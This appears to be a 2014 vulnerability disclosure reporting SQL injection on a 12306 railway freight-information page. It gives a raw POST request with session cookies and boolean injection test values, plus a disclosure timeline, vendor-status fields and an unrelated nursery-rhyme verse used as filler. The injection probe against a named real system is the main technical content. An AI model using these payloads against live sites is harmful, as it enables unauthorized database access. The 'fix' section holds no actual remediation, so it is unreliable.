2014-03-21:细节已通知厂商并且等待厂商处理中
2014-03-22:厂商已经确认,细节仅向厂商公开
2014-04-01:细节向核心白帽子及相关领域专家公开
2014-04-11:细节向普通白帽子公开
2014-04-21:细节向实习白帽子公开
2014-05-05:细节向公众公开
我有一头小毛驴,我从来也不骑
有一天我心血来潮,骑它去赶集
我手里拿着小皮鞭,我心里真得意
不知怎么哗啦啦啦啦啦,摔了一身泥
POST /hyinfo/action/JgxxAction_hwyjl HTTP/1.1
Host: hyfw.12306.cn
Proxy-Connection: keep-alive
Content-Length: 16
Accept: */*
Origin: http://hyfw.12306.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://hyfw.12306.cn/hyinfo/action/JgxxAction_index?type=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: TVvHsVfkbo=MDAwM2IyOWE2NjgwMDAwMDAwMDIwRCsydXcxMzk1NDM5MDgx; JSESSIONID=vvWXTsCLYqrQLJ4LpVYMJzsnxY84zY0wHw6dvDgNPY2VN2ppRndp!-2097492747
lx=ld
lx=ld' or '1'='1
lx=ld' or '1'='2
http://hyfw.12306.cn/hyinfo/action/ClcscxAction_index?cllx=JZX
修复方案:
you know it!
版权声明:转载请注明来源 bing@乌云 漏洞回应 厂商回应:危害等级:高
漏洞Rank:11
确认时间:2014-03-22 18:39
厂商回复:确认中。
最新状态:暂无
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;